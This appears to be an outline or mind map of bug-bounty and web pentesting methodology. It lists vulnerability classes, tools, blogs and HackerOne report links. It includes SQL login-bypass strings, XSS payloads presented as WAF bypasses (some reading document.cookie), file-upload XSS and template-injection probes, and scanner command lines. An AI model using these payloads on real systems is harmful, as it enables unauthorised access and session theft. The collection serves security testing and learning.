1. Response manipulation
1.1. References
1.1.1. Ref 1
2. Reporting Tool
2.1. Serpico
2.2. dradisframework
2.3. bountyplz
2.4. template-generator
3. Unristricted file upload
3.1. Tools
3.1.1. fuxploider
3.1.2. Burp extensions
3.1.2.1. Upload Scanner
3.2. Blogs
3.2.1. Blog 1
3.2.2. Blog 2
3.3. Payloads
3.3.1. Set 1
3.3.2. Set 2
3.3.3. Set 3
4. CRLF Injection (%0d%0a)
4.1. Payloads
5. HTTP request smuggling
5.1. Blogs
5.1.1. Blog 1
5.1.2. Blog 2
5.1.3. Blog 3
5.1.4. Blog 4
5.2. Concept
5.2.1. TE:CE
5.2.2. CE:TE
5.2.3. TE:TE
5.3. Tools
5.3.1. smuggler.py
5.4. Burp extensions
5.4.1. http-request-smuggler
6. Web cache poisoning
7. Web Cache Deception Attack
8. SQL Injection
8.1. Types
8.1.1. Union-based SQLi
8.1.2. Error-based SQLi
8.1.3. Blind SQLi
8.1.3.1. Boolean-based (content-based) Blind SQLi
8.1.3.2. Time-based Blind SQLi
8.1.4. Second-order SQL injection
8.1.4.1. end the query with "#" or "--"
8.1.5. Login SQLi
8.1.5.1. Login bypass payloads
8.1.5.1.1. SQL Query 1) SELECT * FROM users WHERE name='tom' and password='tom' 2) SELECT * FROM users WHERE name='tom' and password='' or '1'='1' 3) SELECT * FROM users WHERE name='tom' and password='' or 1='1' 4) SELECT * FROM users WHERE name='tom' and password='' or 1=1-- -' 5) SELECT * FROM users WHERE name='' or '1'='1' and password='' or '1'='1' 6) SELECT * FROM users WHERE name='' or ' 1=1' and password='' or ' 1=1' 7) SELECT * FROM users WHERE name='1' or 1=1 -- -' and password='blah'
8.2. Tools& extensions
8.2.1. Online tools
8.2.1.1. sql-injection-scanner-online
8.2.2. Offline tools
8.2.2.1. SQLmap
8.2.2.1.1. Basic usage: sqlmap.py -u xyz.com/vuln.php?id=1*
8.2.2.1.2. Adv usage: sqlmap.py -u xyz.com/vuln.php?id=1* --level 3 --risk 3
8.2.2.2. NoSQLMap
8.3. References
8.3.1. sqlwiki
8.3.2. pentest-tools
9. Cross-site scripting (XSS)
9.1. Types
9.1.1. Stored-XSS
9.1.2. Refelected-XSS
9.1.3. DOM-XSS
9.1.4. Blind-XSS
9.1.4.1. XSS Hunter (The Best tool for Blind XSS)
9.1.4.2. ezXSS (Has 2FA, email reports, share reports feature)
9.1.4.3. bXSS (Has slack/SMS notification feature)
9.1.4.4. Knoxss (has email feature & plugin)
9.1.4.5. Burp Collaborator
9.2. Payloads
9.2.1. WAF Bypass
9.2.1.1. Kona WAF (Akamai) Bypass
9.2.1.1.1. \');confirm(1);//
9.2.1.2. ModSecurity WAF Bypass
9.2.1.2.1. <img src=x onerror=prompt(document.cookie) onerror=prompt(document.domain) onerror=prompt(document.domain)>
9.2.1.3. Incapsula WAF Bypasses
9.2.1.3.1. <iframe/onload='this["src"]="javas cript:al"+"ert""';> <img/src=q onerror='new Function`al\ert\`1\"'>
9.2.1.4. Wordfence XSS Bypasses
9.2.1.4.1. <meter onmouseover="alert(1)"
9.2.1.4.2. '">><div><meter onmouseover="alert(1)"</div>"
9.2.1.4.3. >><marquee loop=1 width=0 onfinish=alert(1)>
9.2.2. XSS via file upload
9.2.2.1. XSS in file name
9.2.2.1.1. "><img src=v onerror=prompt(xss);>.jpeg
9.2.2.2. Metadata (exit tool)
9.2.2.2.1. exiftool -Artist=’ “><img src=1 onerror=alert(document.domain)>’ brute.jpeg
9.2.2.3. SVG content XSS
9.2.2.3.1. <svg xmlns="http://www.w3.org/2000/svg" onload="alert(document.domain)"/>
9.2.2.4. Gif extension XSS
9.2.2.4.1. GIF89a/*<svg/onload=alert(1)>*/=alert(document.domain)//;
9.2.2.5. Html extension
9.2.2.5.1. <!DOCTYPE html> <html> <head> <title>XSS</title> </head> <body> <script type="text/javascript">alert(document.cookie)</script> <script>prompt(1);</script> </body> </html>
9.2.3. Set 1
10. Command Injection
10.1. Payloads
10.1.1. Set 1
10.1.2. Set 2
10.2. Tools
10.2.1. commix
10.2.2. Practice labs
10.3. Burp Extensions
10.3.1. Command Injection Attacker
11. Template Injection
11.1. Tools
11.1.1. tplmap
11.2. Types
11.2.1. Twig
11.2.1.1. Payload: {{7*'7'}}
11.2.2. Jinja
11.2.2.1. Payload: {{7*'7'}}
11.2.3. Ruby
11.2.3.1. Payload: <%= 7 * 7 %>
11.3. Payloads & References
11.3.1. Set 1
11.3.2. Blog 1
12. Clickjacking
12.1. Tools and burp extensions
12.1.1. Clickbandit
13. Insecure Deserialization
13.1. Blogs
13.1.1. Blog 1
13.1.2. Blog 2
13.1.3. Blog 3
13.1.4. Blog 4
13.2. Tools
13.2.1. Python pickle
13.2.2. gadgetinspector
13.2.3. ysoserial
13.3. Burp Extensions
13.3.1. Java-Deserialization-Scanner
13.3.2. JavaSerialKiller
13.3.3. burp-ysoserial
13.3.4. SuperSerial
13.3.5. SuperSerial-Active
14. Git Recon
14.1. Tools
14.1.1. gitGraber
14.1.2. Gitrob
14.1.3. truffleHog
14.1.4. github-search
15. Race Condition
15.1. Blog 1
15.2. Blog 2
15.3. Blog 3
15.4. Blog 4
16. Google dorks
16.1. References
16.1.1. GHDB
16.1.2. Bugbounty dorks
16.1.3. Blog 1
16.1.4. Blog 2
16.1.5. google_Dorks_list
17. Subdomain enumeration & takeover
17.1. Blogs
17.1.1. POC
17.1.1.1. Subdomain Take-over poc's github -https://hackerone.com/reports/363778 aws - https://hackerone.com/reports/186766 zendesk https://hackerone.com/reports/759454 Azure - https://hackerone.com/reports/665398 Uptime Robot - https://hackerone.com/reports/781614 fly.io - https://hackerone.com/reports/576857 icn.bg - https://hackerone.com/hacker_dashboard/overview Azure Traffic Manager - https://hackerone.com/reports/570651 tilda.cc - https://hackerone.com/reports/720992 Netlify - https://hackerone.com/reports/197489 Mashery service - https://hackerone.com/reports/275714 fastly - https://hackerone.com/reports/154425 Heroku - https://hackerone.com/reports/365853 UnbouncePages - https://hackerone.com/reports/209004 Tumblr - https://hackerone.com/reports/221631 Shopify -https://hackerone.com/reports/416474 ghost.io https://hackerone.com/reports/368119 CloudFront(CF Origin) - https://hackerone.com/reports/145224 legacy - https://hackerone.com/reports/389783 WordPress - https://hackerone.com/reports/274336 Desk - https://hackerone.com/reports/201796
17.1.2. Edoverflow
17.1.3. patrik
17.2. Tools
17.2.1. Online tools
17.2.1.1. Cyberint
17.2.1.2. Hackking
17.2.1.3. Sub enumeration
17.2.1.4. Virustotal
17.2.2. Offline tools
17.2.2.1. Amass
17.2.2.1.1. Basic-usage: [amass enum -d example.com]
17.2.2.2. Aquatone
17.2.2.2.1. Basic-usage: [cat targets.txt | aquatone {or} type targets.txt | aquatone]
17.2.2.3. Massdns
17.2.2.3.1. Basic-usage: [./bin/massdns {options} {domainlist}]
17.2.2.4. Findomain
17.2.2.4.1. Basic-usage: [findomain -t example.com]
17.2.2.5. Assestfinder
17.2.3. Automation
17.2.3.1. Link 1
17.2.3.2. Link 2
18. Email spoofing vulnerabilities
18.1. Mxtoolbox
18.2. Mail spoofer
19. Directory enumeration
19.1. Wordlist
19.1.1. jhaddix
19.1.2. SecLists
19.2. Tools
19.2.1. Meg
19.2.2. ffuf
19.2.2.1. Basic-usgae: [ffuf -w /path/to/wordlist -u https://target/FUZZ]
19.2.2.1.1. Fuzz file paths from wordlist.txt, match all responses but filter out those with content-size 42. Colored, verbose output. ffuf -w wordlist.txt -u https://example.org/FUZZ -mc all -fs 42 -c -v Fuzz Host-header, match HTTP 200 responses. ffuf -w hosts.txt -u https://example.org/ -H "Host: FUZZ" -mc 200 Fuzz POST JSON data. Match all responses not containing text "error". ffuf -w entries.txt -u https://example.org/ -X POST -H "Content-Type: application/json" \ -d '{"name": "FUZZ", "anotherkey": "anothervalue"}' -fr "error" Fuzz multiple locations. Match only responses reflecting the value of "VAL" keyword. Colored. ffuf -w params.txt:PARAM -w values.txt:VAL -u https://example.org/?PARAM=VAL -mr "VAL" -c
19.2.3. Dirsearch
19.2.3.1. Basic-usage: [python3 dirsearch.py -u <URL> -e <EXTENSION>]
19.2.3.1.1. Options: -h, --help show this help message and exit Mandatory: -u URL, --url=URL URL target -L URLLIST, --url-list=URLLIST URL list target -e EXTENSIONS, --extensions=EXTENSIONS Extension list separated by comma (Example: php,asp) -E, --extensions-list Use predefined list of common extensions Dictionary Settings: -w WORDLIST, --wordlist=WORDLIST -l, --lowercase -f, --force-extensions Force extensions for every wordlist entry (like in DirBuster) General Settings: -s DELAY, --delay=DELAY Delay between requests (float number) -r, --recursive Bruteforce recursively -R RECURSIVE_LEVEL_MAX, --recursive-level-max=RECURSIVE_LEVEL_MAX Max recursion level (subdirs) (Default: 1 [only rootdir + 1 dir]) --suppress-empty, --suppress-empty --scan-subdir=SCANSUBDIRS, --scan-subdirs=SCANSUBDIRS Scan subdirectories of the given -u|--url (separated by comma) --exclude-subdir=EXCLUDESUBDIRS, --exclude-subdirs=EXCLUDESUBDIRS Exclude the following subdirectories during recursive scan (separated by comma) -t THREADSCOUNT, --threads=THREADSCOUNT Number of Threads -x EXCLUDESTATUSCODES, --exclude-status=EXCLUDESTATUSCODES Exclude status code, separated by comma (example: 301, 500) --exclude-texts=EXCLUDETEXTS Exclude responses by texts, separated by comma (example: "Not found", "Error") --exclude-regexps=EXCLUDEREGEXPS Exclude responses by regexps, separated by comma (example: "Not foun[a-z]{1}", "^Error$") -c COOKIE, --cookie=COOKIE --ua=USERAGENT, --user-agent=USERAGENT -F, --follow-redirects -H HEADERS, --header=HEADERS Headers to add (example: --header "Referer: example.com" --header "User-Agent: IE" --random-agents, --random-user-agents Connection Settings: --timeout=TIMEOUT Connection timeout --ip=IP Resolve name to IP address --proxy=HTTPPROXY, --http-proxy=HTTPPROXY Http Proxy (example: localhost:8080 --http-method=HTTPMETHOD Method to use, default: GET, possible also: HEAD;POST --max-retries=MAXRETRIES -b, --request-by-hostname By default dirsearch will request by IP for speed. This forces requests by hostname Reports: --simple-report=SIMPLEOUTPUTFILE Only found paths --plain-text-report=PLAINTEXTOUTPUTFILE Found paths with status codes --json-report=JSONOUTPUTFILE
19.2.4. wfuzz
20. SAML/SSO
20.1. Blogs
20.1.1. https://epi052.gitlab.io/notes-to-self/blog/2019-03-07-how-to-test-saml-a-methodology/ https://epi052.gitlab.io/notes-to-self/blog/2019-03-13-how-to-test-saml-a-methodology-part-two/ https://epi052.gitlab.io/notes-to-self/blog/2019-03-16-how-to-test-saml-a-methodology-part-three/ https://github.com/kelbyludwig/saml-attack-surface http://secretsofappsecurity.blogspot.com/2017/01/saml-security-xml-external-entity-attack.html https://seanmelia.wordpress.com/2016/01/09/xxe-via-saml/ https://hackerone.com/reports/136169
20.2. Burp Extensions
20.2.1. SAMLRaider
21. SSRF
21.1. Online tools
21.1.1. ssrftest
21.1.2. postb.in
21.2. Github tools
21.2.1. httprebind
21.2.2. ssrftest
21.2.3. Ground control
21.2.4. SSRF map
21.3. Blogs & Payloads
21.3.1. https://github.com/jdonsec/AllThingsSSRF https://gist.github.com/jhaddix/78cece26c91c6263653f31ba453e273b https://medium.com/@madrobot/ssrf-server-side-request-forgery-types-and-ways-to-exploit-it-part-1-29d034c27978 https://medium.com/@madrobot/ssrf-server-side-request-forgery-types-and-ways-to-exploit-it-part-2-a085ec4332c0
22. CSRF
22.1. CSRF Bypass
22.1.1. Replacing value of same length
22.1.2. Removing the CSRF token from requests entirely
22.1.3. Decoding CSRF tokens
22.1.4. Extracting token via HTML injection
22.1.5. Using only the static parts of the token
22.1.6. Changing request method
22.1.7. Try to remove the referer header
22.2. Burp extension
22.2.1. EasyCSRF
22.3. JSON-Based CSRF
22.3.1. Blog 1
23. File Inclusion
23.1. RFI
23.2. LFI
23.3. GitHub References & Tools
23.3.1. LFISuite
23.3.2. liffy
23.3.3. fimap
23.4. Payloads
23.4.1. Set 1
23.4.2. Set 2
23.4.3. Set 3
23.4.4. Burp Intruder list
24. IDOR
24.1. Burp Extensions
24.1.1. Authz
24.1.2. AuthMatrix
24.1.3. Authorize
24.2. Blogs
24.2.1. Blog 1
24.2.2. Blog 2
24.2.3. Blog 3
25. XXE
25.1. Online tools
25.1.1. XXE.SH
25.2. Types
25.2.1. Inbound-Xml Inj
25.2.2. OOB-Xml Inj
25.2.3. Error based Xml Inj
25.3. Github tools
25.3.1. oxml_xxe
25.3.2. XXEinjector
25.4. Blogs
25.4.1. https://0xatul.me/posts/2020/02/external-xml-entity-via-file-upload-svg/ https://mahmoudsec.blogspot.com/2019/08/exploiting-out-of-band-xxe-using.html https://github.com/setuid0-sec/Swiss_E-Voting_Publications/blob/master/xxe_setuid0.pdf https://mohemiv.com/all/exploiting-xxe-with-local-dtd-files/ https://honoki.net/2018/12/12/from-blind-xxe-to-root-level-file-read-access/ https://www.corben.io/XSS-to-XXE-in-Prince/ https://medium.com/@zain.sabahat/an-interesting-xxe-in-sap-8b35fec6ef33
26. Some Git repo's, Burp extensions...etc
26.1. Git repos
26.1.1. AWS offensive/defensive
26.1.2. Key hacks
26.1.3. Github Monitoring
26.1.4. Pentest-tools
26.2. Shodan monitoring
26.3. Burp extensions
26.3.1. HUNT
26.4. Blogs
26.4.1. pentester.land
27. Redirect
27.1. Online tools
27.1.1. Hackking
27.2. Blogs
27.2.1. Blog 1